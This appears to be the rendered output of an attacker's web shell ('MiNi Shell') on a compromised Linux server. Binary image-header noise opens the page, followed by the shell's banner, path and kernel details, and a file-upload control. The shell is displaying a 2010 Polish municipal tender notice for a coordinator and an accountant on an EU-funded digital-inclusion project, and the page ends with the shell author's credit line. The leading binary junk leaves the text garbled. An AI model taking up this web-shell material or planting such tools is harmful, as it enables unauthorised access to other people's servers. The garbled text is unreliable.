JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100615/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100615/168576-N-2010.html

<p class="kh_header"><b>Stoczek: Pełnienie funkcji koordynatora i księgowego projektu pn.: Równać do najlepszych - informatyzacja drogą do sukcesu</b><br>
<b>Numer ogłoszenia: 168576 - 2010; data zamieszczenia: 15.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Stoczek , ul. Kosowska 5, 07-104 Stoczek, woj. mazowieckie, tel. 025 6919020 w. 25, 6919002, faks 025 6919025.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.stoczek.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji koordynatora i księgowego projektu pn.: Równać do najlepszych - informatyzacja drogą do sukcesu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje pełnienie funkcji koordynatora i księgowego projektu pn.: Równać do najlepszych - informatyzacja drogą do sukcesu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach działania 8.3. Przeciwdziałanie wykluczeniu cyfrowemu-eInclusion osi priorytetowej 8. Społeczeństwo informacyjne - zwiększanie innowacyjności gospodarki Programu Operacyjnego Innowacyjna Gospodarka 2007-2013.
Szacunkowa wartość Projektu wynosi  920 360 zł. Okres realizacji Projektu 30 miesięcy. Projekt ma na celu zapewnienie dostępu do Internetu dla osób zagrożonych wykluczeniem cyfrowym z powodu trudnej sytuacji materialnej lub niepełnosprawności. 
W skład projektu wchodzić będzie: 
-zakup 82 szt. komputerów przenośnych wraz z licencjonowanym oprogramowaniem systemowym i narzędziowym dla beneficjentów ostatecznych projektu tj. 70 rodzin z terenu gm. Stoczek wytypowanych przez komisję rekrutacyjną oraz 4 jednostek organizacyjnych Zamawiającego bezpośrednio zaangażowanych w realizację projektu. 
- zakup 4 drukarek sieciowych dla w/w jednostek organizacyjnych 
- budowa bezprzewodowej infrastruktury sieciowej opartej o standard WiFi, obejmująca budowę i konfigurację 8 nowych stacji odbiorczo-przekaźnikowych, doposażenie i modernizację 6 istniejących, 
-montaż 73 zestawów abonenckich do odbioru sygnału internetowego tym 3 dla jednostek podległych.
-serwis sieci i zestawów abonenckich
-dostawa usługi internetowej 
-organizacja szkoleń dla 70 beneficjentów projektu z zakresu podstaw obsługi komputera i oprogramowania narzędziowego 
-ubezpieczenie urządzeń,
-promocja projektu (tablice informacyjne i ogłoszenia prasowe),
-zakup materiałów biurowych niezbędnych do realizacji projektu.
-Koordynacja projektu 
-Obsługa księgowa projektu.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 75.11.21.00-5, 79.42.10.00-1, 79.42.11.00-2, 79.21.10.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonali lub wykonują w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 usługę polegającą na:
- dla zadania nr 1 - pełnieniu funkcji koordynatora projektu o wartości brutto jednego projektu równej lub większej niż 500 000,00 zł realizowanego w ramach Programu Operacyjnego Innowacyjna Gospodarka, którego główny przedmiot związany był/jest z informatyzacją. 
- dla zadania nr 2 - pełnieniu funkcji księgowego projektu o wartości brutto jednego projektu równej lub większej niż 500 000,00 zł realizowanego w ramach Programu Operacyjnego Innowacyjna Gospodarka.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują minimum jedną osobą odpowiedzialną za realizację usługi: 
- dla zadania nr 1 - pełnienia funkcji koordynatora projektu, posiadającą wykształcenie min. wyższe ekonomiczne, oraz min. 3 letnie doświadczenie zawodowe w jednostce sektora finansów publicznych.
- dla zadania nr 2 - pełnienia funkcji księgowego projektu posiadającą wykształcenie min. średnie ekonomiczne, oraz min. 3 letnie doświadczenie zawodowe w jednostce sektora finansów publicznych, na stanowisku związanym z księgowością.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany  terminu realizacji zadania w przypadku:
- przerw w realizacji projektu, powstałych z przyczyn zależnych 
od Zamawiającego,
- przerw w realizacji projektu, powstałych z przyczyn niezależnych 
od Zamawiającego i Wykonawcy,
- zmian terminu realizacji projektu powstałych z przyczyn niezależnych 
od Wykonawcy.
- wystąpienia okoliczności zewnętrznych uniemożliwiających prawidłowe zakończenie rzeczowo-finansowe projektu w wyznaczonym terminie.
Zmiana terminu realizacji zadania nie ma wpływu na zmianę wynagrodzenia należnego wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.stoczek.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Stoczku
ul. Kosowska 5, 07-104 Stoczek
pok. nr 5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.06.2010 godzina 10:00, miejsce: Urząd Gminy w Stoczku
ul. Kosowska 5, 07-104 Stoczek
pok. nr 3 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia współfinansowany jest przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach działania 8.3.Przeciwdziałanie wykluczeniu cyfrowemu-eInclusion osi priorytetowej 8. Społeczeństwo informacyjne - zwiększanie innowacyjności gospodarki Programu Operacyjnego Innowacyjna Gospodarka 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pełnienie funkcji koordynatora projektu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje:
- Prowadzenie i realizacja projektu, Nadzór nad jego realizacją zgodnie z umową, wnioskiem o dofinansowanie oraz harmonogramem rzeczowo-finansowym,
- Terminowe i właściwe realizowanie całości projektu, w szczególności  zarządzanie przedsięwzięciem na wszystkich jego etapach
- Nadzór nad zgodnością prowadzonych działań z zapisami zawartymi 
w umowie  o dofinansowanie i wniosku, w tym budżetem i harmonogramem 
- Kierowanie wykonaniem projektu w formie nadzoru merytorycznego 
i technicznego zgodnie z harmonogramem realizacji projektu, z zawartą umową o dofinansowanie projektu oraz wnioskiem aplikacyjnym oraz przepisami krajowymi i Unii Europejskiej
- Koordynacja realizacji wszystkich zadań,
- Nadzór nad całością prac związanych z realizacją projektu i ich jakością,
- Zarządzanie planowanymi działaniami projektowymi.
- Nadzorowanie bieżących postępów w realizacji projektu.
- Utrzymywanie stałych kontaktów z opiekunem projektu w Instytucji Pośredniczącej, informowanie na bieżąco o wszystkich zaistniałych problemach w realizacji projektu, terminowe przesyłanie wszystkich wymaganych dokumentów i informacji, przestrzeganie obowiązków i zaleceń wynikających z realizacji umowy, procedur, standardów, instrukcji do sprawozdań oraz innych obowiązujących dokumentów.   
- Rzetelne i terminowe sporządzanie wniosków o płatność wraz z zebraniem wszystkich załączników, w tym sporządzanie ostatniego wniosku o płatność. 
- Odpowiednie opisywanie dokumentów związanych z realizacją projektu, zgodnie z wytycznymi.
- Przygotowywanie i koordynacja korespondencji związanej z projektem do Instytucji Pośredniczącej oraz pozostałych instytucji związanych z realizacją projektu,.
- Koordynacja prac zespołu projektowego i podejmowanie decyzji.
- Nadzorowanie pracy wszystkich osób zaangażowanych w realizację projektu. 
- Informowanie zamawiającego o przebiegu wykonywania przedmiotu umowy, 
- Kierowanie bieżącymi sprawami związanymi z realizacją projektu.
- Prowadzenie bieżącej dokumentacji projektu w oparciu o obowiązujące zapisy.
- Kontrola wydatkowania środków.
- Planowanie działań i wywiązywanie się ze wskaźników.
- Dokonywanie systematycznej kontroli uzyskanych efektów.
- Zapewnienie terminowej realizacji zadań wynikających z harmonogramu realizacji projektu.
- Nadzór nad prawidłowym wykonaniem prac zleconych, objętych projektem,
- Kompleksowe przygotowanie i realizację zamówień publicznych zgodnie z ustawą Prawo Zamówień Publicznych w zakresie działań projektowych. 
- Pełnienie dyżurów w siedzibie Zamawiającego min. 2 godziny dziennie 
w czasie godzin pracy Urzędu, tj. między 8:00 a 16:00,
- Współpraca z Komórkami organizacyjnymi Urzędu Gminy oraz jednostkami organizacyjnymi zamawiającego zaangażowanymi w realizację projektu,
- Wykonywanie czynności administracyjnych związanych z realizacją projektu.
- Współpraca z księgowym w zakresie przygotowania wniosków 
o płatność oraz  sprawozdań finansowych,
- Kompletowanie i przygotowywanie dokumentów finansowych dla księgowego,
- Poddanie się kontroli prowadzonej przez organy wewnętrzne i instytucje zewnętrzne w zakresie realizacji projektu.
- Obecność podczas kontroli projektu, również po zakończeniu realizacji projektu.
- Kontrola efektywnego i zgodnego z założeniami projektu wykorzystywania sprzętu powierzonego beneficjentom ostatecznym,
- Bieżąca realizacja zadań wynikających z projektu i współpraca 
z księgowym projektu.
- Wykonywanie zadań składających się na proces rekrutacji grupy docelowej. 
- Współpraca z komisją rekrutacyjną powołaną przez zamawiającego.
- Tworzenie bazy uczestników projektu,
- Monitorowanie uczestnictwa Beneficjentów ostatecznych.
- Monitoring i ewaluacja projektu oraz organizacja i koordynacja promocji projektu zgodnie z zasadami obowiązującymi dla danego projektu.
- Nadzór nad prowadzeniem strony internetowej dotyczącej projektu (dbałość o aktualne dane).
- Dokonywanie innych czynności zastrzeżonych do kompetencji Koordynatora.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.11.21.00-5, 79.42.10.00-1, 79.42.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pełnienie funkcji księgowego projektu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje:
- Wspieranie działań Koordynatora projektu w aspekcie księgowym, w odniesieniu do poszczególnych zadań objętych projektem, a także okresowe dokonywanie przeglądów realizacji projektów.
- Współpraca z koordynatorem w zakresie przygotowania wniosków 
o płatność w tym wniosku o płatność końcową oraz  sprawozdań finansowych oraz innych dokumentów finansowych niezbędnych do realizacji i rozliczenia projektu,
- Prowadzenie dokumentacji księgowej projektu zgodnie z obowiązującymi przepisami finansowymi, w tym opisywanie faktur.
- Kontrola poprawności formalnej księgowych i finansowych dokumentów projektu.
- Realizacja płatności w ramach projektu, 
- Nadzór nad płatnościami dla wykonawców. 
- Kontrola wydatkowania środków.
- Przygotowanie niezbędnych zestawień finansowych,
- Współpraca w zakresie księgowania i realizacji płatności projektu z Referatem Finansowym Urzędu Gminy w Stoczku.
- Współpraca w zakresie księgowości z Instytucją Pośredniczącą 
i Zarządzającą.
- Odpowiednie opisywanie dokumentów związanych z realizacją projektu, zgodnie z wytycznymi.
- Kontrola poprawności dokonanej klasyfikacji dokumentów z uwagi na: nazwę projektu, kwotę wynikającą z budżetu projektu a wielkością zrealizowaną, źródło finansowania, pozycje budżetowe projektów, podział na wydatki kwalifikowane, kategorie dodatkowe (zależnie od potrzeb projektu).
- Dokonywanie kontroli księgowania kosztów projektu pod kątem spełnienia kryteriów dla tzw. wydatków kwalifikowanych, a w szczególności sprawdzenia czy są: konieczne dla wykonania zadań określonych projektem; związane z finansowaniem umów zawartych przez zamawiającego w celu osiągnięcia zadań wynikających z opisu projektu i są związane z realizacją projektu; udokumentowane odpowiednimi i prawidłowo sporządzonymi dokumentami źródłowymi.
- Kontrola zgodności bilansu finansowanego projektu, wykonana w oparciu o zapisy księgowe.         
- Przygotowanie we współpracy z Koordynatorem projektu harmonogramu płatności wg zasad określonych w dokumentach programowych.
- Prawidłowe oznaczenie i opisanie dokumentów księgowych przetwarzanych przy realizacji projektu.
- Sporządzanie zestawień dokumentów rozliczeniowych przedstawiających wykorzystanie środków realizowanego projektu. 
- Przygotowanie raportów o finansowym postępie w realizacji projektu. 
- Zapobieganie powstawaniu nieprawidłowości finansowych i raportowanie ich wystąpienia. 
- Prowadzenie ewidencji księgowej dokumentów.
- Weryfikacja faktur pod względem formalno-rachunkowym i prawidłowości rozliczeń finansowych uwzględniających wszystkie źródła finansowania. 
- Przestrzeganie procedur i instrukcji związanych z realizacją projektu.
- Ścisła współpraca z Głównym Księgowym Zamawiającego w zakresie księgowości projektu. 
- Współpraca z Koordynatorem w celu zapewnienia prawidłowego przepływu informacji.
- Współpraca z organami kontrolującymi.
- Poddanie się kontroli prowadzonej przez organy wewnętrzne i instytucje zewnętrzne w zakresie realizacji projektu.
- Obecność podczas kontroli projektu, również po zakończeniu realizacji projektu.
- Pełnienie dyżurów w siedzibie Zamawiającego min. 2 godziny dziennie 
w czasie godzin pracy Urzędu, tj. między 8:00 a 16:00
- Dokonywanie innych czynności zastrzeżonych do kompetencji Księgowego projektu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.11.21.00-5, 79.21.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com